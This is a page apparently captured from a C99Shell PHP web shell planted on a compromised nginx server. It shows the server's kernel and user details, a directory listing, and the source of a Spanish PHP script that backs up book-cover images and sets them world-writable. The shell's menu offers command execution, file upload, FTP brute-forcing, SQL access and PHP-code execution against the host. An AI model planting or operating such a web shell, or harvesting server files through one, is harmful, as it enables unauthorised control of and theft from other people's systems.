!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/automatas/   drwxrwxrwx
Free 83.36 GB of 96.73 GB (86.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     backup_portadas_noftp.php (1.31 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include "../frames/conn.php";
$sql="select * from ".BBDD.".sinopsis  order by id desc";
echo 
$sql;
$res=mysql_query($sql,$conn);
echo 
mysql_error();
$array=array('0','1','2','3','4','5','6','7','8','9','0',
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','Ñ','O','P','Q','R','S','T','U','V','W','X','Y','Z','(');
// creamos directorios
foreach ($array as $valor){

if (
is_dir("./backup_includes/$valor")) {

}
else {
mkdir("./backup_includes/$valor");

echo 
"se ha creado el directorio<br>";
}
}
$directorio=dir("../frames/includes");
$pepito=0;
while (
$archivo $directorio->read() and $pepito=0)


{
$pepito=1;

    echo 
$archivo."<br>";
exit();


}



echo 
"<pre>";
while (
$row=mysql_fetch_array($res)){
ECHO 
$row['id_book']."-";



$titulo=$row["imagename"];    
echo 
$titulo."<br>";
$letra=substr($titulo,0,1);
echo 
"letra=$letra<br>";
$filename="./backup_includes/".STRTOUPPER($letra)."/$titulo";
if (
file_exists($filename)){
echo 
"existe fichero <b>$filename</b><br>";
}else{
//print_r($row);
echo "<b>NO</b> existe fichero <b>$filename</b>. Copiando al destino<br>";
chmod("../frames/includes/$titulo"0777);  
    
if (
copy ("../frames/includes/$titulo","$filename")) {
echo 
"-            copiado correctamente<br>";
}else{
echo 
"-            <b>fallo copiando ../libros/$titulo a destino $filename</b><br>";

}    



}



}

    

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0031 ]--